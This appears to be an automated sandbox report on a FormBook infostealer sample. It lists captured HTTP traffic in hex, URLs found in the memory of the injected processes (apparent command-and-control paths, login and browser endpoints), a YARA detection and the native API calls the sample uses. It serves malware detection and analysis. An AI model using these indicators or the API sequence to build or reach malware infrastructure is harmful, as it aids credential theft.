e8M1O0*eTT%g`t!Wq/D{TH,'=WV5<oau9buXL:>wJ:26>qG8x{+$.<z3T&A"D1s{`w)|S9)a#Bknc.04(r0u?~0
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0 (Ubuntu)Date: Mon, 10 Mar 2025 11:32:04 GMTContent-Type: text/html; charset=iso-8859-1Transfer-Encoding: chunkedConnection: closeContent-Encoding: gzipData Raw: 65 38 0d 0a 1f 8b 08 00 00 00 00 00 00 03 4d 8f 31 4f c3 30 10 85 f7 fc 8a a3 13 0c f8 d2 2a 03 83 65 09 9a 54 54 0a 25 02 67 60 74 f1 21 57 a4 71 b0 2f 44 fc 7b 9c 54 48 2c 27 bd bb ef 3d bd 93 57 e5 f3 56 bf 35 15 3c ea a7 1a 9a f6 a1 de 6f 61 75 8b b8 af f4 0e b1 d4 e5 e5 b2 11 39 62 75 58 a9 4c 3a 3e 77 4a 3a 32 36 09 3e 71 47 aa c8 0b 38 78 86 9d 1f 7b 2b f1 b2 cc 24 2e 90 3c 7a fb 33 fb d6 ea 1f 93 54 26 07 a5 1d 41 a0 af 91 22 93 85 f6 a5 86 c9 44 e8 13 f7 31 73 e0 7b 60 77 8a 10 29 7c 53 10 12 87 39 29 a4 61 ac 0d 14 a3 ba 1f cc bb 23 dc 88 42 14 6b b8 6e 8f 63 cf e3 0d bc 2e 06 30 0c d3 34 89 cf ce c4 28 98 cc 19 1a 1f 18 ee 72 89 7f 01 a9 e7 d2 30 75 9a 3f cb 7e 01 ea f2 fe f1 14 01 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: e8M1O0*eTT%g`t!Wq/D{TH,'=WV5<oau9buXL:>wJ:26>qG8x{+$.<z3T&A"D1s{`w)|S9)a#Bknc.04(r0u?~0
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0 (Ubuntu)Date: Mon, 10 Mar 2025 11:32:07 GMTContent-Type: text/html; charset=iso-8859-1Transfer-Encoding: chunkedConnection: closeData Raw: 31 31 34 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 34 31 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 77 77 77 2e 6b 6c 61 73 73 2e 74 65 61 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a 0d 0a 30 0d 0a 0d 0a Data Ascii: 114<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><hr><address>Apache/2.4.41 (Ubuntu) Server at www.klass.team Port 80</address></body></html>0
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 10 Mar 2025 11:32:35 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closeETag: W/"67c990a0-582"X-Edge-Location: MonoData Raw: 35 38 32 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 73 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 69 65 3d 65 64 67 65 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 50 c3 a1 67 69 6e 61 20 6e 6f 20 65 6e 63 6f 6e 74 72 61 64 61 3c 2f 74 69 74 6c 65 3e 0a 0a 20 20 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 20 20 20 20 62 6f 64 79 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 22 4d 75 73 65 6f 53 61 6e 73 22 2c 20 22 4f 70 65 6e 53 61 6e 73 22 2c 20 22 48 65 6c 76 65 74 69 63 61 20 4e 65 75 65 22 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 41 72 69 61 6c 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 31 30 30 70 78 20 30 3b 0a 20 20 20 20 20 20 20 20 7d 0a 0a 20 20 20 20 20 20 20 20 6e 61 76 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 61 75 74 6f 3b 0a 20 20 20 20 20 20 20 20 7d 0a 0a 20 20 20 20 20 20 20 20 68 31 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 34 30 70 78 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 20 39 30 70 78 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 7d 0a 0a 20 20 20 20 20 20 20 20 70 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 20 62 6f 6c 64 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 32 32 70 78 3b 0a 20 20 20 20 20 20 20 20 7d 0a 0a 20 20 20 20 20 20 20 20 61 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 20 6e 6f 6e 65 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 64 69 73 70 6c 61 79 3a 20 62 6c 6f 63 6b 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 30 30 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 77 69 64 74 68 3a
                Source: help.exe, 0000000C.00000002.3727905859.0000000006290000.00000004.00000800.00020000.00000000.sdmp, help.exe, 0000000C.00000002.3724951790.0000000005540000.00000004.10000000.00040000.00000000.sdmp, nS7xrGJCV5KYH1dhdb.exe, 0000000E.00000002.3724009660.0000000004160000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://digi-searches.com/Dialis.cfm?fp=rqH%2F7QYwcrVUrhErClF6vqpVmobftKznsjjNu2jgo4sjVCPa9oppRKszlj%
                Source: help.exe, 0000000C.00000002.3727905859.0000000006290000.00000004.00000800.00020000.00000000.sdmp, help.exe, 0000000C.00000002.3724951790.0000000005540000.00000004.10000000.00040000.00000000.sdmp, nS7xrGJCV5KYH1dhdb.exe, 0000000E.00000002.3724009660.0000000004160000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://digi-searches.com/Fethiye%2C_Calis.cfm?fp=rqH%2F7QYwcrVUrhErClF6vqpVmobftKznsjjNu2jgo4sjVCPa9
                Source: help.exe, 0000000C.00000002.3727905859.0000000006290000.00000004.00000800.00020000.00000000.sdmp, help.exe, 0000000C.00000002.3724951790.0000000005540000.00000004.10000000.00040000.00000000.sdmp, nS7xrGJCV5KYH1dhdb.exe, 0000000E.00000002.3724009660.0000000004160000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://digi-searches.com/Los_Calis.cfm?fp=rqH%2F7QYwcrVUrhErClF6vqpVmobftKznsjjNu2jgo4sjVCPa9oppRKsz
                Source: help.exe, 0000000C.00000002.3727905859.0000000006290000.00000004.00000800.00020000.00000000.sdmp, help.exe, 0000000C.00000002.3724951790.0000000005540000.00000004.10000000.00040000.00000000.sdmp, nS7xrGJCV5KYH1dhdb.exe, 0000000E.00000002.3724009660.0000000004160000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://digi-searches.com/South_America_Travel_Packages.cfm?fp=rqH%2F7QYwcrVUrhErClF6vqpVmobftKznsjjN
                Source: help.exe, 0000000C.00000002.3727905859.0000000006290000.00000004.00000800.00020000.00000000.sdmp, help.exe, 0000000C.00000002.3724951790.0000000005540000.00000004.10000000.00040000.00000000.sdmp, nS7xrGJCV5KYH1dhdb.exe, 0000000E.00000002.3724009660.0000000004160000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://digi-searches.com/Travel_Service_International.cfm?fp=rqH%2F7QYwcrVUrhErClF6vqpVmobftKznsjjNu
                Source: help.exe, 0000000C.00000002.3727905859.0000000006290000.00000004.00000800.00020000.00000000.sdmp, help.exe, 0000000C.00000002.3724951790.0000000005540000.00000004.10000000.00040000.00000000.sdmp, nS7xrGJCV5KYH1dhdb.exe, 0000000E.00000002.3724009660.0000000004160000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://i4.cdn-image.com/__media__/fonts/montserrat-bold/montserrat-bold.eot
                Source: help.exe, 0000000C.00000002.3727905859.0000000006290000.00000004.00000800.00020000.00000000.sdmp, help.exe, 0000000C.00000002.3724951790.0000000005540000.00000004.10000000.00040000.00000000.sdmp, nS7xrGJCV5KYH1dhdb.exe, 0000000E.00000002.3724009660.0000000004160000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://i4.cdn-image.com/__media__/fonts/montserrat-bold/montserrat-bold.eot?#iefix
                Source: help.exe, 0000000C.00000002.3727905859.0000000006290000.00000004.00000800.00020000.00000000.sdmp, help.exe, 0000000C.00000002.3724951790.0000000005540000.00000004.10000000.00040000.00000000.sdmp, nS7xrGJCV5KYH1dhdb.exe, 0000000E.00000002.3724009660.0000000004160000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://i4.cdn-image.com/__media__/fonts/montserrat-bold/montserrat-bold.otf
                Source: help.exe, 0000000C.00000002.3727905859.0000000006290000.00000004.00000800.00020000.00000000.sdmp, help.exe, 0000000C.00000002.3724951790.0000000005540000.00000004.10000000.00040000.00000000.sdmp, nS7xrGJCV5KYH1dhdb.exe, 0000000E.00000002.3724009660.0000000004160000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://i4.cdn-image.com/__media__/fonts/montserrat-bold/montserrat-bold.svg#montserrat-bold
                Source: help.exe, 0000000C.00000002.3727905859.0000000006290000.00000004.00000800.00020000.00000000.sdmp, help.exe, 0000000C.00000002.3724951790.0000000005540000.00000004.10000000.00040000.00000000.sdmp, nS7xrGJCV5KYH1dhdb.exe, 0000000E.00000002.3724009660.0000000004160000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://i4.cdn-image.com/__media__/fonts/montserrat-bold/montserrat-bold.ttf
                Source: help.exe, 0000000C.00000002.3727905859.0000000006290000.00000004.00000800.00020000.00000000.sdmp, help.exe, 0000000C.00000002.3724951790.0000000005540000.00000004.10000000.00040000.00000000.sdmp, nS7xrGJCV5KYH1dhdb.exe, 0000000E.00000002.3724009660.0000000004160000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://i4.cdn-image.com/__media__/fonts/montserrat-bold/montserrat-bold.woff
                Source: help.exe, 0000000C.00000002.3727905859.0000000006290000.00000004.00000800.00020000.00000000.sdmp, help.exe, 0000000C.00000002.3724951790.0000000005540000.00000004.10000000.00040000.00000000.sdmp, nS7xrGJCV5KYH1dhdb.exe, 0000000E.00000002.3724009660.0000000004160000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://i4.cdn-image.com/__media__/fonts/montserrat-bold/montserrat-bold.woff2
                Source: help.exe, 0000000C.00000002.3727905859.0000000006290000.00000004.00000800.00020000.00000000.sdmp, help.exe, 0000000C.00000002.3724951790.0000000005540000.00000004.10000000.00040000.00000000.sdmp, nS7xrGJCV5KYH1dhdb.exe, 0000000E.00000002.3724009660.0000000004160000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://i4.cdn-image.com/__media__/fonts/montserrat-regular/montserrat-regular.eot
                Source: help.exe, 0000000C.00000002.3727905859.0000000006290000.00000004.00000800.00020000.00000000.sdmp, help.exe, 0000000C.00000002.3724951790.0000000005540000.00000004.10000000.00040000.00000000.sdmp, nS7xrGJCV5KYH1dhdb.exe, 0000000E.00000002.3724009660.0000000004160000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://i4.cdn-image.com/__media__/fonts/montserrat-regular/montserrat-regular.eot?#iefix
                Source: help.exe, 0000000C.00000002.3727905859.0000000006290000.00000004.00000800.00020000.00000000.sdmp, help.exe, 0000000C.00000002.3724951790.0000000005540000.00000004.10000000.00040000.00000000.sdmp, nS7xrGJCV5KYH1dhdb.exe, 0000000E.00000002.3724009660.0000000004160000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://i4.cdn-image.com/__media__/fonts/montserrat-regular/montserrat-regular.otf
                Source: help.exe, 0000000C.00000002.3727905859.0000000006290000.00000004.00000800.00020000.00000000.sdmp, help.exe, 0000000C.00000002.3724951790.0000000005540000.00000004.10000000.00040000.00000000.sdmp, nS7xrGJCV5KYH1dhdb.exe, 0000000E.00000002.3724009660.0000000004160000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://i4.cdn-image.com/__media__/fonts/montserrat-regular/montserrat-regular.svg#montserrat-regular
                Source: help.exe, 0000000C.00000002.3727905859.0000000006290000.00000004.00000800.00020000.00000000.sdmp, help.exe, 0000000C.00000002.3724951790.0000000005540000.00000004.10000000.00040000.00000000.sdmp, nS7xrGJCV5KYH1dhdb.exe, 0000000E.00000002.3724009660.0000000004160000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://i4.cdn-image.com/__media__/fonts/montserrat-regular/montserrat-regular.ttf
                Source: help.exe, 0000000C.00000002.3727905859.0000000006290000.00000004.00000800.00020000.00000000.sdmp, help.exe, 0000000C.00000002.3724951790.0000000005540000.00000004.10000000.00040000.00000000.sdmp, nS7xrGJCV5KYH1dhdb.exe, 0000000E.00000002.3724009660.0000000004160000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://i4.cdn-image.com/__media__/fonts/montserrat-regular/montserrat-regular.woff
                Source: help.exe, 0000000C.00000002.3727905859.0000000006290000.00000004.00000800.00020000.00000000.sdmp, help.exe, 0000000C.00000002.3724951790.0000000005540000.00000004.10000000.00040000.00000000.sdmp, nS7xrGJCV5KYH1dhdb.exe, 0000000E.00000002.3724009660.0000000004160000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://i4.cdn-image.com/__media__/fonts/montserrat-regular/montserrat-regular.woff2
                Source: help.exe, 0000000C.00000002.3727905859.0000000006290000.00000004.00000800.00020000.00000000.sdmp, help.exe, 0000000C.00000002.3724951790.0000000005540000.00000004.10000000.00040000.00000000.sdmp, nS7xrGJCV5KYH1dhdb.exe, 0000000E.00000002.3724009660.0000000004160000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://i4.cdn-image.com/__media__/js/min.js?v2.3
                Source: help.exe, 0000000C.00000002.3727905859.0000000006290000.00000004.00000800.00020000.00000000.sdmp, help.exe, 0000000C.00000002.3724951790.0000000005540000.00000004.10000000.00040000.00000000.sdmp, nS7xrGJCV5KYH1dhdb.exe, 0000000E.00000002.3724009660.0000000004160000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://i4.cdn-image.com/__media__/pics/10667/netsol-logos-2020-165-50.jpg
                Source: help.exe, 0000000C.00000002.3727905859.0000000006290000.00000004.00000800.00020000.00000000.sdmp, help.exe, 0000000C.00000002.3724951790.0000000005540000.00000004.10000000.00040000.00000000.sdmp, nS7xrGJCV5KYH1dhdb.exe, 0000000E.00000002.3724009660.0000000004160000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://i4.cdn-image.com/__media__/pics/28903/search.png)
                Source: help.exe, 0000000C.00000002.3727905859.0000000006290000.00000004.00000800.00020000.00000000.sdmp, help.exe, 0000000C.00000002.3724951790.0000000005540000.00000004.10000000.00040000.00000000.sdmp, nS7xrGJCV5KYH1dhdb.exe, 0000000E.00000002.3724009660.0000000004160000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://i4.cdn-image.com/__media__/pics/28905/arrrow.png)
                Source: help.exe, 0000000C.00000002.3727905859.0000000006290000.00000004.00000800.00020000.00000000.sdmp, help.exe, 0000000C.00000002.3724951790.0000000005540000.00000004.10000000.00040000.00000000.sdmp, nS7xrGJCV5KYH1dhdb.exe, 0000000E.00000002.3724009660.0000000004160000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://i4.cdn-image.com/__media__/pics/29590/bg1.png)
                Source: help.exe, 0000000C.00000002.3727905859.0000000006290000.00000004.00000800.00020000.00000000.sdmp, help.exe, 0000000C.00000002.3724951790.0000000005540000.00000004.10000000.00040000.00000000.sdmp, nS7xrGJCV5KYH1dhdb.exe, 0000000E.00000002.3724009660.0000000004160000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://i4.cdn-image.com/__media__/pics/468/netsol-favicon-2020.jpg
                Source: Zjf9D3oDifslon7.bat.exe, 00000000.00000002.1287457712.0000000002DB8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                Source: help.exe, 0000000C.00000002.3727905859.0000000006290000.00000004.00000800.00020000.00000000.sdmp, help.exe, 0000000C.00000002.3724951790.0000000005540000.00000004.10000000.00040000.00000000.sdmp, nS7xrGJCV5KYH1dhdb.exe, 0000000E.00000002.3724009660.0000000004160000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.Calimade.net
                Source: help.exe, 0000000C.00000002.3727905859.0000000006290000.00000004.00000800.00020000.00000000.sdmp, help.exe, 0000000C.00000002.3724951790.0000000005540000.00000004.10000000.00040000.00000000.sdmp, nS7xrGJCV5KYH1dhdb.exe, 0000000E.00000002.3724009660.0000000004160000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.calimade.net/__media__/design/underconstructionnotice.php?d=calimade.net
                Source: help.exe, 0000000C.00000002.3727905859.0000000006290000.00000004.00000800.00020000.00000000.sdmp, help.exe, 0000000C.00000002.3724951790.0000000005540000.00000004.10000000.00040000.00000000.sdmp, nS7xrGJCV5KYH1dhdb.exe, 0000000E.00000002.3724009660.0000000004160000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.calimade.net/__media__/js/trademark.php?d=calimade.net&type=ns
                Source: nS7xrGJCV5KYH1dhdb.exe, 0000000E.00000002.3726633182.0000000004C0C000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.urbagan.net
                Source: nS7xrGJCV5KYH1dhdb.exe, 0000000E.00000002.3726633182.0000000004C0C000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.urbagan.net/yas3/
                Source: help.exe, 0000000C.00000002.3728422030.0000000007D68000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ac.ecosia.org?q=
                Source: help.exe, 0000000C.00000002.3724951790.0000000005540000.00000004.10000000.00040000.00000000.sdmp, nS7xrGJCV5KYH1dhdb.exe, 0000000E.00000002.3724009660.0000000004160000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://cdn.consentmanager.net
                Source: help.exe, 0000000C.00000002.3728422030.0000000007D68000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
                Source: help.exe, 0000000C.00000002.3728422030.0000000007D68000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
                Source: help.exe, 0000000C.00000002.3728422030.0000000007D68000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
                Source: help.exe, 0000000C.00000002.3724951790.0000000005540000.00000004.10000000.00040000.00000000.sdmp, nS7xrGJCV5KYH1dhdb.exe, 0000000E.00000002.3724009660.0000000004160000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://delivery.consentmanager.net
                Source: nS7xrGJCV5KYH1dhdb.exe, 0000000E.00000002.3724009660.0000000004160000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://dts.gnpge.com
                Source: help.exe, 0000000C.00000002.3728422030.0000000007D68000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/?q=
                Source: help.exe, 0000000C.00000002.3728422030.0000000007D68000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/ac/?q=
                Source: help.exe, 0000000C.00000002.3728422030.0000000007D68000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/chrome_newtabv20-
                Source: help.exe, 0000000C.00000002.3728422030.0000000007D68000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://gemini.google.com/app?q=
                Source: help.exe, 0000000C.00000002.3722073116.0000000002FFD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.#
                Source: help.exe, 0000000C.00000002.3722073116.0000000002FFD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_authorize.srf?client_id=00000000480728C5&scope=service::ssl.live.com:
                Source: help.exe, 0000000C.00000002.3722073116.0000000002FFD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_authorize.srfclient_id=00000000480728C5&scope=service::ssl.live.com::
                Source: help.exe, 0000000C.00000003.1605148294.0000000007D48000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_authorize.srfhttps://login.live.com/oauth20_desktop.srfhttps://login.
                Source: help.exe, 0000000C.00000002.3722073116.0000000002FFD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srf?lc=1033
                Source: help.exe, 0000000C.00000002.3722073116.0000000002FFD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srflc=1033
                Source: help.exe, 0000000C.00000002.3722073116.0000000002FFD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srf?client_id=00000000480728C5&redirect_uri=https://login.live
                Source: help.exe, 0000000C.00000002.3722073116.0000000002FFD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srfclient_id=00000000480728C5&redirect_uri=https://login.live.
                Source: help.exe, 0000000C.00000002.3728422030.0000000007D68000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.ecosia.org/newtab/v20
                Source: help.exe, 0000000C.00000002.3724951790.000000000508A000.00000004.10000000.00040000.00000000.sdmp, nS7xrGJCV5KYH1dhdb.exe, 0000000E.00000002.3724009660.0000000003CAA000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.google.com
                Source: help.exe, 0000000C.00000002.3728422030.0000000007D68000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_alldp

                E-Banking Fraud

                barindex
                Yara detected FormBook
                Source: Yara matchFile source: 5.2.Zjf9D3oDifslon7.bat.exe.400000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 5.2.Zjf9D3oDifslon7.bat.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000005.00000002.1425567653.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000C.00000002.3723926592.00000000032C0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000C.00000002.3723986742.0000000003310000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000C.00000002.3721644285.0000000002B40000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000005.00000002.1513121982.00000000070B0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000E.00000002.3726633182.0000000004BB0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000B.00000002.3723823865.00000000039E0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000005.00000002.1427356722.0000000003160000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: C:\Users\user\Desktop\Zjf9D3oDifslon7.bat.exeCode function: 5_2_0042C623 NtClose,5_2_0042C623
                Source: C:\Users\user\Desktop\Zjf9D3oDifslon7.bat.exeCode function: 5_2_01882B60 NtClose,LdrInitializeThunk,5_2_01882B60
                Source: C:\Users\user\Desktop\Zjf9D3oDifslon7.bat.exeCode function: 5_2_01882DF0 NtQuerySystemInformation,LdrInitializeThunk,5_2_01882DF0
                Source: C:\Users\user\Desktop\Zjf9D3oDifslon7.bat.exeCode function: 5_2_01882C70 NtFreeVirtualMemory,LdrInitializeThunk,5_2_01882C70
                Source: C:\Users\user\Desktop\Zjf9D3oDifslon7.bat.exeCode function: 5_2_018835C0 NtCreateMutant,LdrInitializeThunk,5_2_018835C0
                Source: C:\Users\user\Desktop\Zjf9D3oDifslon7.bat.exeCode function: 5_2_01884340 NtSetContextThread,5_2_01884340
                Source: C:\Users\user\Desktop\Zjf9D3oDifslon7.bat.exeCode function: 5_2_01884650 NtSuspendThread,5_2_01884650
                Source: C:\Users\user\Desktop\Zjf9D3oDifslon7.bat.exeCode function: 5_2_01882B80 NtQueryInformationFile,5_2_01882B80
                Source: C:\Users\user\Desktop\Zjf9D3oDifslon7.bat.exeCode function: 5_2_01882BA0 NtEnumerateValueKey,5_2_01882BA0
                Source: C:\Users\user\Desktop\Zjf9D3oDifslon7.bat.exeCode function: 5_2_01882BE0 NtQueryValueKey,5_2_01882BE0
                Source: C:\Users\user\Desktop\Zjf9D3oDifslon7.bat.exeCode function: 5_2_01882BF0 NtAllocateVirtualMemory,5_2_01882BF0
                Source: C:\Users\user\Desktop\Zjf9D3oDifslon7.bat.exeCode function: 5_2_01882AB0 NtWaitForSingleObject,5_2_01882AB0
                Source: C:\Users\user\Desktop\Zjf9D3oDifslon7.bat.exeCode function: 5_2_01882AD0 NtReadFile,5_2_01882AD0
                Source: C:\Users\user\Desktop\Zjf9D3oDifslon7.bat.exeCode function: 5_2_01882AF0 NtWriteFile,5_2_01882AF0
                Source: C:\Users\user\Desktop\Zjf9D3oDifslon7.bat.exeCode function: 5_2_01882DB0 NtEnumerateKey,5_2_01882DB0
                Source: C:\Users\user\Desktop\Zjf9D3oDifslon7.bat.exeCode function: 5_2_01882DD0 NtDelayExecution,5_2_01882DD0
                Source: C:\Users\user\Desktop\Zjf9D3oDifslon7.bat.exeCode function: 5_2_01882D00 NtSetInformationFile,5_2_01882D00
                Source: C:\Users\user\Desktop\Zjf9D3oDifslon7.bat.exeCode function: 5_2_01882D10 NtMapViewOfSection,5_2_01882D10
                Source: C:\Users\user\Desktop\Zjf9D3oDifslon7.bat.exeCode function: 5_2_01882D30 NtUnmapViewOfSection,5_2_01882D30
                Source: C:\Users\user\Desktop\Zjf9D3oDifslon7.bat.exeCode function: 5_2_01882CA0 NtQueryInformationToken,5_2_01882CA0
                Source: C:\Users\user\Desktop\Zjf9D3oDifslon7.bat.exeCode function: 5_2_01882CC0 NtQueryVirtualMemory,5_2_01882CC0
                Source: C:\Users\user\Desktop\Zjf9D3oDifslon7.bat.exeCode function: 5_2_01882CF0 NtOpenProcess,5_2_01882CF0
                Source: C:\Users\user\Desktop\Zjf9D3oDifslon7.bat.exeCode function: 5_2_01882C00 NtQueryInformationProcess,5_2_01882C00
                Source: C:\Users\user\Desktop\Zjf9D3oDifslon7.bat.exeCode function: 5_2_01882C60 NtCreateKey,5_2_01882C60
